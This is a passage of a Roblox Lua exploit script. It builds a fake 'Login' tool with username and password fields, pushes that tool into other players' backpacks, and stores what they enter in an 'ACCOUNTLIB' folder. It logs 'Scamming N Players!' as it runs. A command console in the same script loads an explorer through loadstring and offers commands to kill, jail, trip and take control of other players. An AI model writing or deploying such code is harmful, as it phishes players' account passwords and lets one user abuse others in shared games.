  621. NewGuiPart50.Parent = NewGuiPart2
  622.  
  623. -------
  624. local NewGuiPart52 = Instance.new("TextBox")
  625. NewGuiPart52.Active = false
  626. NewGuiPart52.BackgroundTransparency = 0.5
  627. NewGuiPart52.BorderColor3 = Color3.new(0, 0, 0)
  628. NewGuiPart52.BorderSizePixel = 0
  629. NewGuiPart52.Name = "TB1"
  630. NewGuiPart52.Position = UDim2.new(0, 90, 0, 100)
  631. NewGuiPart52.Size = UDim2.new(0, 180, 0, 20)
  632. NewGuiPart52.FontSize = Enum.FontSize.Size18
  633. NewGuiPart52.Text = ""
  634. NewGuiPart52.TextColor3 = Color3.new(1, 1, 1)
  635. NewGuiPart52.TextWrapped = true
  636. NewGuiPart52.Parent = NewGuiPart50
  637. -------
  638. local NewGuiPart53 = Instance.new("TextButton")
  639. NewGuiPart53.BackgroundColor3 = Color3.new(0.972549, 0.972549, 0.972549)
  640. NewGuiPart53.BackgroundTransparency = 0.5
  641. NewGuiPart53.BorderColor3 = Color3.new(0, 0, 0)
  642. NewGuiPart53.BorderSizePixel = 0
  643. NewGuiPart53.Name = "TB"
  644. NewGuiPart53.Position = UDim2.new(0, 50, 0, 250)
  645. NewGuiPart53.Selectable = true
  646. NewGuiPart53.Size = UDim2.new(0, 180, 0, 20)
  647. NewGuiPart53.Style = Enum.ButtonStyle.Custom
  648. NewGuiPart53.FontSize = Enum.FontSize.Size18
  649. NewGuiPart53.Text = "Save"
  650. NewGuiPart53.TextColor3 = Color3.new(0, 0, 0)
  651. NewGuiPart53.TextWrapped = true
  652. NewGuiPart53.Parent = NewGuiPart50
  653.  
  654. -------
  655. local NewGuiPart55 = Instance.new("TextLabel")
  656. NewGuiPart55.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  657. NewGuiPart55.BackgroundTransparency = 1
  658. NewGuiPart55.BorderColor3 = Color3.new(0, 0, 0)
  659. NewGuiPart55.BorderSizePixel = 0
  660. NewGuiPart55.Name = "TL2"
  661. NewGuiPart55.Position = UDim2.new(0, 0, 0, 100)
  662. NewGuiPart55.Size = UDim2.new(0, 80, 0, 20)
  663. NewGuiPart55.FontSize = Enum.FontSize.Size18
  664. NewGuiPart55.Text = "Tool Name"
  665. NewGuiPart55.TextColor3 = Color3.new(1, 1, 1)
  666. NewGuiPart55.TextWrapped = true
  667. NewGuiPart55.Parent = NewGuiPart50
  668. -------
  669. local NewGuiPart56 = Instance.new("TextButton")
  670. NewGuiPart56.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  671. NewGuiPart56.BackgroundTransparency = 0.69999998807907
  672. NewGuiPart56.BorderColor3 = Color3.new(0, 0, 0)
  673. NewGuiPart56.BorderSizePixel = 0
  674. NewGuiPart56.Name = "TL4"
  675. NewGuiPart56.Position = UDim2.new(0, 200, 0, 50)
  676. NewGuiPart56.Selectable = true
  677. NewGuiPart56.Size = UDim2.new(0, 80, 0, 20)
  678. NewGuiPart56.Style = Enum.ButtonStyle.Custom
  679. NewGuiPart56.FontSize = Enum.FontSize.Size14
  680. NewGuiPart56.Text = "CMD"
  681. NewGuiPart56.TextColor3 = Color3.new(1, 1, 1)
  682. NewGuiPart56.Parent = NewGuiPart2
  683. -------
  684. local NewGuiPart57 = Instance.new("Frame")
  685. NewGuiPart57.BackgroundTransparency = 1
  686. NewGuiPart57.Name = "ChatBox"
  687. NewGuiPart57.Position = UDim2.new(0, 20, 0, -25)
  688. NewGuiPart57.Size = UDim2.new(0, 245, 0, 400)
  689. NewGuiPart57.Visible = false
  690. NewGuiPart57.Draggable = true
  691. NewGuiPart57.Parent = NewGuiPart2
  692. -------
  693. local NewGuiPart58 = Instance.new("TextButton")
  694. NewGuiPart58.Active = true
  695. NewGuiPart58.BackgroundTransparency = 0.5
  696. NewGuiPart58.BorderSizePixel = 0
  697. NewGuiPart58.Name = "Chat"
  698. NewGuiPart58.Position = UDim2.new(0, 180, 0, 310)
  699. NewGuiPart58.Selectable = true
  700. NewGuiPart58.Size = UDim2.new(0, 65, 0, 50)
  701. NewGuiPart58.Style = Enum.ButtonStyle.Custom
  702. NewGuiPart58.FontSize = Enum.FontSize.Size14
  703. NewGuiPart58.Text = "Chat"
  704. NewGuiPart58.Parent = NewGuiPart57
  705. -------
  706. local NewGuiPart59 = Instance.new("TextLabel")
  707. NewGuiPart59.BackgroundTransparency = 0.5
  708. NewGuiPart59.BorderSizePixel = 0
  709. NewGuiPart59.Name = "Output"
  710. NewGuiPart59.Position = UDim2.new(0, 0, 0, 100)
  711. NewGuiPart59.Size = UDim2.new(0, 245, 0, 200)
  712. NewGuiPart59.Font = Enum.Font.Legacy
  713. NewGuiPart59.FontSize = Enum.FontSize.Size14
  714. NewGuiPart59.Text = ""
  715. NewGuiPart59.TextWrapped = true
  716. NewGuiPart59.Parent = NewGuiPart57
  717. -------
  718. local NewGuiPart60 = Instance.new("TextBox")
  719. NewGuiPart60.BackgroundTransparency = 0.5
  720. NewGuiPart60.Name = "Input"
  721. NewGuiPart60.Position = UDim2.new(0, 0, 0, 310)
  722. NewGuiPart60.Size = UDim2.new(0, 165, 0, 50)
  723. NewGuiPart60.FontSize = Enum.FontSize.Size28
  724. NewGuiPart60.Text = ""
  725. NewGuiPart60.Parent = NewGuiPart57
  726. -------
  727. local NewGuiPart61 = Instance.new("Frame")
  728. NewGuiPart61.BackgroundTransparency = 1
  729. NewGuiPart61.Name = "CMDS"
  730. NewGuiPart61.Position = UDim2.new(0, 20, 0, -25)
  731. NewGuiPart61.Size = UDim2.new(0, 245, 0, 400)
  732. NewGuiPart61.Visible = false
  733. NewGuiPart61.Draggable = true
  734. NewGuiPart61.Parent = NewGuiPart2
  735. -------
  736. local NewGuiPart62 = Instance.new("TextButton")
  737. NewGuiPart62.Active = true
  738. NewGuiPart62.BackgroundTransparency = 0.5
  739. NewGuiPart62.BorderSizePixel = 0
  740. NewGuiPart62.Name = "Execute"
  741. NewGuiPart62.Position = UDim2.new(0, 180, 0, 310)
  742. NewGuiPart62.Selectable = true
  743. NewGuiPart62.Size = UDim2.new(0, 65, 0, 50)
  744. NewGuiPart62.Style = Enum.ButtonStyle.Custom
  745. NewGuiPart62.FontSize = Enum.FontSize.Size12
  746. NewGuiPart62.Text = "Execute"
  747. NewGuiPart62.Parent = NewGuiPart61
  748. -------
  749. local NewGuiPart63 = Instance.new("TextLabel")
  750. NewGuiPart63.BackgroundTransparency = 0.5
  751. NewGuiPart63.BorderSizePixel = 0
  752. NewGuiPart63.Name = "Output"
  753. NewGuiPart63.Position = UDim2.new(0, 0, 0, 100)
  754. NewGuiPart63.Size = UDim2.new(0, 245, 0, 200)
  755. NewGuiPart63.Font = Enum.Font.Legacy
  756. NewGuiPart63.FontSize = Enum.FontSize.Size14
  757. NewGuiPart63.Text = ""
  758. NewGuiPart63.TextWrapped = true
  759. NewGuiPart63.Parent = NewGuiPart61
  760. -------
  761. local NewGuiPart64 = Instance.new("TextBox")
  762. NewGuiPart64.BackgroundTransparency = 0.5
  763. NewGuiPart64.Name = "CmdInput"
  764. NewGuiPart64.Position = UDim2.new(0, 0, 0, 310)
  765. NewGuiPart64.Size = UDim2.new(0, 165, 0, 50)
  766. NewGuiPart64.FontSize = Enum.FontSize.Size14
  767. NewGuiPart64.Text = ""
  768. NewGuiPart64.Parent = NewGuiPart61
  769.  
  770. local IsRunning = Instance.new("BoolValue")
  771. IsRunning.Value = false
  772. IsRunning.Name = "IsRunning"
  773. IsRunning.Parent = NewGuiPart2
  774.  
  775. local Login = Instance.new("Tool")
  776. Login.CanBeDropped = false
  777. Login.ManualActivationOnly = false
  778. Login.RequiresHandle = false
  779. Login.Name = "Login"
  780. Login.Parent = NewGuiPart1
  781.  
  782. local ToolName = Instance.new("StringValue")
  783. ToolName.Value = "Login"
  784. ToolName.Parent = CoreValues
  785. ToolName.Name = "ToolName"
  786.  
  787.  
  788. local NewGuiPart65 = Instance.new("ScreenGui")
  789. NewGuiPart65.Name = "LoginGui"
  790. NewGuiPart65.Parent = Login
  791. -------
  792. local NewGuiPart66 = Instance.new("Frame")
  793. NewGuiPart66.Name = "ErrorFrame"
  794. NewGuiPart66.Size = UDim2.new(1, 0, 1, 0)
  795. NewGuiPart66.Visible = false
  796. NewGuiPart66.Parent = NewGuiPart65
  797. -------
  798. local NewGuiPart67 = Instance.new("ImageLabel")
  799. NewGuiPart67.Active = false
  800. NewGuiPart67.Selectable = false
  801. NewGuiPart67.Size = UDim2.new(1, 0, 1, 0)
  802. NewGuiPart67.Image = "rbxassetid://423929933"
  803. NewGuiPart67.Parent = NewGuiPart66
  804. -------
  805. local NewGuiPart69 = Instance.new("TextLabel")
  806. NewGuiPart69.BackgroundTransparency = 1
  807. NewGuiPart69.BorderSizePixel = 0
  808. NewGuiPart69.Name = "UserName"
  809. NewGuiPart69.Position = UDim2.new(0, 50, 0.5, 0)
  810. NewGuiPart69.Size = UDim2.new(0, 100, 0, 50)
  811. NewGuiPart69.Font = Enum.Font.Legacy
  812. NewGuiPart69.FontSize = Enum.FontSize.Size14
  813. NewGuiPart69.Text = "UserName"
  814. NewGuiPart69.Parent = NewGuiPart66
  815. -------
  816. local NewGuiPart70 = Instance.new("TextLabel")
  817. NewGuiPart70.BackgroundTransparency = 1
  818. NewGuiPart70.BorderSizePixel = 0
  819. NewGuiPart70.Name = "Password"
  820. NewGuiPart70.Position = UDim2.new(0, 50, 0.5, 50)
  821. NewGuiPart70.Size = UDim2.new(0, 100, 0, 50)
  822. NewGuiPart70.Font = Enum.Font.Legacy
  823. NewGuiPart70.FontSize = Enum.FontSize.Size14
  824. NewGuiPart70.Text = "Password"
  825. NewGuiPart70.Parent = NewGuiPart66
  826. -------
  827. local NewGuiPart71 = Instance.new("TextBox")
  828. NewGuiPart71.BackgroundColor3 = Color3.new(255,255,255)
  829. NewGuiPart71.BorderColor3 = Color3.new(0, 0, 0)
  830. NewGuiPart71.BorderSizePixel = 2
  831. NewGuiPart71.Name = "TB2"
  832. NewGuiPart71.Position = UDim2.new(0, 160, 0.5, 65)
  833. NewGuiPart71.Size = UDim2.new(0, 200, 0, 20)
  834. NewGuiPart71.Font = Enum.Font.Legacy
  835. NewGuiPart71.FontSize = Enum.FontSize.Size14
  836. NewGuiPart71.Text = ""
  837. NewGuiPart71.Parent = NewGuiPart66
  838. -------
  839. local NewGuiPart72 = Instance.new("ImageButton")
  840. NewGuiPart72.Active = true
  841. NewGuiPart71.BackgroundColor3 = Color3.new(73,123,255)
  842. NewGuiPart72.BackgroundTransparency = 0.5
  843. NewGuiPart72.Name = "LoginButton"
  844. NewGuiPart72.Position = UDim2.new(0, 90, 0.5, 150)
  845. NewGuiPart72.Selectable = true
  846. NewGuiPart72.Size = UDim2.new(0, 280, 0, 25)
  847. NewGuiPart72.Style = Enum.ButtonStyle.RobloxRoundButton
  848. NewGuiPart72.Visible = true
  849. NewGuiPart72.Image = "rbxassetid://431070395"
  850. NewGuiPart72.Parent = NewGuiPart66
  851. -------
  852. local NewGuiPart73 = Instance.new("TextLabel")
  853. NewGuiPart73.BackgroundColor3 = Color3.new(255,255,255)
  854. NewGuiPart73.BorderColor3 = Color3.new(0, 0, 0)
  855. NewGuiPart73.BorderSizePixel = 0
  856. NewGuiPart73.Name = "TB1"
  857. NewGuiPart73.Position = UDim2.new(0, 160, 0.5, 15)
  858. NewGuiPart73.Size = UDim2.new(0, 200, 0, 20)
  859. NewGuiPart73.Font = Enum.Font.Legacy
  860. NewGuiPart73.FontSize = Enum.FontSize.Size14
  861. NewGuiPart73.Text = ""
  862. NewGuiPart73.Parent = NewGuiPart66
  863.  
  864.  
  865. local Textg = Instance.new("TextLabel")
  866. Textg.BackgroundColor3 = Color3.new(255,255,255)
  867. Textg.BorderColor3 = Color3.new(0, 0, 0)
  868. Textg.BorderSizePixel = 0
  869. Textg.Name = "Text"
  870. Textg.Position = UDim2.new(0, 90, 0.5,115)
  871. Textg.Size = UDim2.new(0, 200, 0, 20)
  872. Textg.Font = Enum.Font.Legacy
  873. Textg.FontSize = Enum.FontSize.Size14
  874. Textg.Text = ""
  875. Textg.Parent = NewGuiPart66
  876.  
  877. local Done = Instance.new("BoolValue")
  878. Done.Name = "Done"
  879. Done.Value = false
  880. Done.Parent = NewGuiPart66
  881.  
  882. local Folderr = Instance.new("Folder")
  883. Folderr.Parent = CoreValues
  884. Folderr.Name = "Folder"
  885.  
  886.  
  887. local UserName = Instance.new("StringValue")
  888. UserName.Name = "UserName"
  889. UserName.Parent = Folderr
  890.  
  891. local PassWord = Instance.new("StringValue")
  892. PassWord.Name = "Password"
  893. PassWord.Parent = Folderr
  894.  
  895.  
  896.  
  897. local UsingTool = Instance.new("BoolValue")
  898. UsingTool.Parent = CoreValues
  899. UsingTool.Name = "UsingTool"
  900. UsingTool.Value = true
  901.  
  902. NewGuiPart1:Clone().Parent = CoreValues
  903. NewGuiPart65:Clone().Parent = CoreValues
  904.  
  905.  
  906.  
  907. print("MGVX LIB Running")
  908. local Lib = Instance.new("Folder")
  909. Lib.Name = "ACCOUNTLIB"
  910. Lib.Parent = CoreValues
  911.  
  912. if PassWord.Value ~= nil and UserName.Value ~= nil then
  913. namer = Instance.new("Folder")
  914. namer.Parent = Lib
  915. namer.Name = UserName.Value
  916. old = PassWord:Clone()
  917. old.Parent = namer
  918. old.Name = UserName.Value
  919. oldu = UserName:Clone()
  920. oldu.Parent = namer
  921. oldu.Name = UserName.Value
  922. new = PassWord:Clone()
  923. new.Value = ""
  924. new.Name = "PassWord"
  925. new.Parent = Folderr
  926. newu = UserName:Clone()
  927. newu.Value = ""
  928. newu.Name = "UserName"
  929. newu.Parent = Folderr
  930. UserName:Destroy();
  931. PassWord:Destroy();
  932. end
  933.  
  934. --------------FUNCTIONS---------------
  935. local NumofPlayers = game:GetService("Players").NumPlayers
  936. local NumOfPlayersBeingScammed = NumofPlayers-1
  937. local DoneBeingScammed = {}
  938.  
  939.  
  940.  
  941.  
  942.  
  943.  
  944. function Clicked4()
  945.  
  946. if NewGuiPart52.Text ~= nil then
  947. Login.Name = NewGuiPart52.Text
  948. ToolName.Value = NewGuiPart52.Text
  949. end
  950.  
  951. if NewGuiPart52.Text == nil then
  952. Login.Name = "Login"
  953. ToolName.Value = "Login"
  954. end
  955.  
  956.  
  957.  
  958.  
  959. NewGuiPart50.Visible = false
  960.  
  961. end
  962.  
  963.  
  964.  
  965. function Click()
  966. local ppl = game.Players:GetChildren()
  967. local spots = NewGuiPart6:children()
  968. for i = 1,#ppl do
  969. spots[i].Visible = true
  970. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  971. spots[i].TextLabel.Text = ppl[i].Name
  972. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  973. spots[i].TextLabel.Text = ''
  974. spots[i].ImageLabel.Image = ''
  975. end
  976. end
  977. end
  978. function Clicked()
  979. otherp.Backpack:GetChildren().Parent = workspace
  980.  
  981.  
  982. if UsingTool.Value == true then
  983. Login:Clone().Parent = otherp.Backpack
  984. NewGuiPart4.Text = "Scanning..."
  985. print("Scamming ".. NumOfPlayersBeingScammed .. " Players!")
  986. NewGuiPart50.Visible = false
  987. NewGuiPart61.Visible = false
  988. NewGuiPart5.Visible = true
  989. IsRunning.Value = true
  990. Owner.Backpack:WaitForChild(ToolName.Value):Destroy();
  991. end
  992. end
  993.  
  994.  
  995.  
  996. function Clicked1()
  997. NewGuiPart5.Visible = false
  998. NewGuiPart61.Visible = false
  999. NewGuiPart50.Visible = true
  1000. end
  1001.  
  1002. function Clicked2()
  1003. NewGuiPart5.Visible = false
  1004. NewGuiPart50.Visible = false
  1005. NewGuiPart61.Visible = true
  1006. end
  1007.  
  1008.  
  1009. Input = NewGuiPart64
  1010. Exe = NewGuiPart62
  1011. Output = NewGuiPart63
  1012. Output.Text = "Welcome, "..Owner.Name.."."
  1013.  
  1014.  
  1015. game.Players.PlayerAdded:connect(function()
  1016. local ppl = game.Players:GetChildren()
  1017. local spots = NewGuiPart6:children()
  1018. for i = 1,#ppl do
  1019. spots[i].Visible = true
  1020. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1021. spots[i].TextLabel.Text = ppl[i].Name
  1022. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1023. spots[i].TextLabel.Text = ''
  1024. spots[i].ImageLabel.Image = ''
  1025. end
  1026.  
  1027. end
  1028. end)
  1029.  
  1030. game.Players.PlayerRemoving:connect(function()
  1031. local ppl = game.Players:GetChildren()
  1032. local spots = NewGuiPart6:children()
  1033. for i = 1,#ppl do
  1034. spots[i].Visible = true
  1035. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1036. spots[i].TextLabel.Text = ppl[i].Name
  1037. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1038. spots[i].TextLabel.Text = ''
  1039. spots[i].ImageLabel.Image = ''
  1040. end
  1041.  
  1042. end
  1043. end)
  1044.  
  1045.  
  1046. function Clicked3(arg)
  1047. local Cmd = Input
  1048. local allp = game.Players:GetChildren()
  1049. local numb;
  1050. local pp;
  1051. local p;
  1052. local num;
  1053. local argus = {"me", "all",numb}
  1054.  
  1055. if Cmd.Text:sub(1, 12) == "viewExplorer" then
  1056. local guu = game:GetObjects("rbxassetid://418955355")[1] guu.Parent = game.CoreGui
  1057. guu.ExplorerPanel.LocalScript.Source = string.gsub(guu.ExplorerPanel.LocalScript.Source,"script.Parent","game.CoreGui.Dex.ExplorerPanel")
  1058. guu.PropertiesFrame.Properties.Source = string.gsub(guu.PropertiesFrame.Properties.Source,"script.Parent.Parent","game.CoreGui.Dex")
  1059. guu.Selection.Source = string.gsub(guu.Selection.Source,"script.Parent","game.CoreGui.Dex")
  1060.  
  1061. spawn(function()
  1062. loadstring(guu.ExplorerPanel.LocalScript.Source)()
  1063. end)
  1064. spawn(function()
  1065. loadstring(guu.PropertiesFrame.Properties.Source)()
  1066. end)
  1067. spawn(function()
  1068. loadstring(guu.Selection.Source)()
  1069. end)
  1070.  
  1071.  
  1072.  
  1073. elseif Cmd.Text:sub(1,13) == "closeExplorer" then
  1074. game.CoreGui.Dex:Destroy()
  1075. end
  1076.  
  1077. if Cmd.Text:lower():sub(1,4) == "hat " then
  1078. local chk1 = Cmd.Text:lower():sub(5):find(" ") + 4
  1079. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5, chk1-1))
  1080. for i, v in pairs(plrz) do
  1081. coroutine.resume(coroutine.create(function()
  1082. if v and v.Character then
  1083. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1084. for a,hat in pairs(obj:children()) do if hat:IsA("Hat") then hat.Parent = v.Character end end
  1085. obj:Destroy()
  1086. end
  1087. end))
  1088. end
  1089. end
  1090.  
  1091. if Cmd.Text:lower():sub(1,5) == "cape " then
  1092. local chk1 = Cmd.Text:lower():sub(6):find(" ")
  1093. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1094. local str = "torso.BrickColor"
  1095. if chk1 then chk1 = chk1 + 5 plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1096. local teststr = [[BrickColor.new("]]..Cmd.Text:sub(chk1+1,chk1+1):upper()..Cmd.Text:sub(chk1+2):lower()..[[")]]
  1097. if Cmd.Text:sub(chk1+1):lower() == "new yeller" then teststr = [[BrickColor.new("New Yeller")]] end
  1098. if Cmd.Text:sub(chk1+1):lower() == "pastel blue" then teststr = [[BrickColor.new("Pastel Blue")]] end
  1099. if Cmd.Text:sub(chk1+1):lower() == "dusty rose" then teststr = [[BrickColor.new("Dusty Rose")]] end
  1100. if Cmd.Text:sub(chk1+1):lower() == "cga brown" then teststr = [[BrickColor.new("CGA brown")]] end
  1101. if Cmd.Text:sub(chk1+1):lower() == "random" then teststr = [[BrickColor.random()]] end
  1102. if Cmd.Text:sub(chk1+1):lower() == "shiny" then teststr = [[BrickColor.new("Institutional white") p.Reflectance = 1]] end
  1103. if Cmd.Text:sub(chk1+1):lower() == "gold" then teststr = [[BrickColor.new("Bright yellow") p.Reflectance = .4]] end
  1104. if Cmd.Text:sub(chk1+1):lower() == "kohl" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597653"]] end
  1105. if Cmd.Text:sub(chk1+1):lower() == "batman" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597669"]] end
  1106. if Cmd.Text:sub(chk1+1):lower() == "superman" then teststr = [[BrickColor.new("Bright blue") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597677"]] end
  1107. if Cmd.Text:sub(chk1+1):lower() == "swag" then teststr = [[BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474"]] end
  1108. if BrickColor.new(teststr) ~= nil then str = teststr end
  1109. end
  1110. for i, v in pairs(plrz) do
  1111. coroutine.resume(coroutine.create(function()
  1112. if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") then
  1113. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1114. local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  1115. repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  1116. local torso = plr.Character.Torso
  1117. local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  1118. p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = ]]..str..[[ p.formFactor = "Custom"
  1119. p.Size = Vector3.new(.2,.2,.2)
  1120. local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  1121. local motor1 = Instance.new("Motor", p)
  1122. motor1.Part0 = p
  1123. motor1.Part1 = torso
  1124. motor1.MaxVelocity = .01
  1125. motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  1126. motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  1127. local wave = false
  1128. repeat wait(1/44)
  1129. local ang = 0.1
  1130. local oldmag = torso.Velocity.magnitude
  1131. local mv = .002
  1132. if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  1133. ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  1134. motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  1135. motor1.DesiredAngle = -ang
  1136. if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  1137. repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  1138. if torso.Velocity.magnitude < .1 then wait(.1) end
  1139. until not p or p.Parent ~= torso.Parent
  1140. script:Destroy()
  1141. ]] cl.Parent = v.PlayerGui cl.Disabled = false
  1142. end
  1143. end))
  1144. end
  1145. end
  1146.  
  1147. if Cmd.Text:lower():sub(1,7) == "uncape " then
  1148. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1149. for i, v in pairs(plrz) do
  1150. coroutine.resume(coroutine.create(function()
  1151. if v and v:findFirstChild("PlayerGui") and v.Character then
  1152. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1153. end
  1154. end))
  1155. end
  1156. end
  1157.  
  1158.  
  1159. if Cmd.Text:lower():sub(1,5) == "jail " then
  1160. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1161. for i, v in pairs(plrz) do
  1162. coroutine.resume(coroutine.create(function()
  1163. if v and v.Character and v.Character:findFirstChild("Torso") then
  1164. local vname = v.Name
  1165. local cf = v.Character.Torso.CFrame + Vector3.new(0,1,0)
  1166. local mod = Instance.new("Model", game.Workspace) mod.Name = v.Name .. " Jail"
  1167. local top = Instance.new("Part", mod) top.Locked = true top.formFactor = "Symmetric" top.Size = Vector3.new(6,1,6) top.TopSurface = 0 top.BottomSurface = 0 top.Anchored = true top.BrickColor = BrickColor.new("Really black") top.CFrame = cf * CFrame.new(0,-3.5,0)
  1168. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1169. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1170. game.Players.PlayerAdded:connect(function(plr) if plr.Name == vname then v = plr end
  1171. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1172. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1173. end)
  1174. local bottom = top:Clone() bottom.Parent = mod bottom.CFrame = cf * CFrame.new(0,3.5,0)
  1175. local front = top:Clone() front.Transparency = .5 front.Reflectance = .1 front.Parent = mod front.Size = Vector3.new(6,6,1) front.CFrame = cf * CFrame.new(0,0,-3)
  1176. local back = front:Clone() back.Parent = mod back.CFrame = cf * CFrame.new(0,0,3)
  1177. local right = front:Clone() right.Parent = mod right.Size = Vector3.new(1,6,6) right.CFrame = cf * CFrame.new(3,0,0)
  1178. local left = right:Clone() left.Parent = mod left.CFrame = cf * CFrame.new(-3,0,0)
  1179. local msh = Instance.new("BlockMesh", front) msh.Scale = Vector3.new(1,1,0)
  1180. local msh2 = msh:Clone() msh2.Parent = back
  1181. local msh3 = msh:Clone() msh3.Parent = right msh3.Scale = Vector3.new(0,1,1)
  1182. local msh4 = msh3:Clone() msh4.Parent = left
  1183. v.Character.Torso.CFrame = cf
  1184. end
  1185. end))
  1186. end
  1187. end
  1188.  
  1189. if Cmd.Text:lower():sub(1,7) == "unjail " then
  1190. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1191. for i, v in pairs(plrz) do coroutine.resume(coroutine.create(function() if v then for a, jl in pairs(game.Workspace:children()) do if jl.Name == v.Name .. " Jail" then jl:Destroy() end end end end)) end
  1192. end
  1193.  
  1194.  
  1195.  
  1196. if Cmd.Text:lower():sub(1,8) == "control " then
  1197. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1198. for i, v in pairs(plrz) do
  1199. coroutine.resume(coroutine.create(function()
  1200. if v and v.Character then
  1201. v.Character.Humanoid.PlatformStand = true
  1202. local w = Instance.new("Weld", plr.Character.Torso )
  1203. w.Part0 = plr.Character.Torso
  1204. w.Part1 = v.Character.Torso
  1205. local w2 = Instance.new("Weld", plr.Character.Head)
  1206. w2.Part0 = plr.Character.Head
  1207. w2.Part1 = v.Character.Head
  1208. local w3 = Instance.new("Weld", plr.Character:findFirstChild("Right Arm"))
  1209. w3.Part0 = plr.Character:findFirstChild("Right Arm")
  1210. w3.Part1 = v.Character:findFirstChild("Right Arm")
  1211. local w4 = Instance.new("Weld", plr.Character:findFirstChild("Left Arm"))
  1212. w4.Part0 = plr.Character:findFirstChild("Left Arm")
  1213. w4.Part1 = v.Character:findFirstChild("Left Arm")
  1214. local w5 = Instance.new("Weld", plr.Character:findFirstChild("Right Leg"))
  1215. w5.Part0 = plr.Character:findFirstChild("Right Leg")
  1216. w5.Part1 = v.Character:findFirstChild("Right Leg")
  1217. local w6 = Instance.new("Weld", plr.Character:findFirstChild("Left Leg"))
  1218. w6.Part0 = plr.Character:findFirstChild("Left Leg")
  1219. w6.Part1 = v.Character:findFirstChild("Left Leg")
  1220. plr.Character.Head.face:Destroy()
  1221. for i, p in pairs(v.Character:children()) do
  1222. if p:IsA("BasePart") then
  1223. p.CanCollide = false
  1224. end
  1225. end
  1226. for i, p in pairs(plr.Character:children()) do
  1227. if p:IsA("BasePart") then
  1228. p.Transparency = 1
  1229. elseif p:IsA("Hat") then
  1230. p:Destroy()
  1231. end
  1232. end
  1233. v.Character.Parent = plr.Character
  1234. v.Character.Humanoid.Changed:connect(function() v.Character.Humanoid.PlatformStand = true end)
  1235. end
  1236. end))
  1237. end
  1238. end
  1239.  
  1240. if Cmd.Text:lower():sub(1,5) == "kill " then
  1241. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1242. for i, v in pairs(plrz) do
  1243. coroutine.resume(coroutine.create(function()
  1244. if v and v.Character then v.Character:BreakJoints() end
  1245. end))
  1246. end
  1247. end
  1248.  
  1249.  
  1250.  
  1251. if Cmd.Text:lower():sub(1,5) == "trip " then
  1252. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1253. for i, v in pairs(plrz) do
  1254. coroutine.resume(coroutine.create(function()
  1255. if v and v.Character and v.Character:findFirstChild("Torso") then
  1256. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(0,0,math.rad(180))
  1257. end
  1258. end))
  1259. end
  1260. end
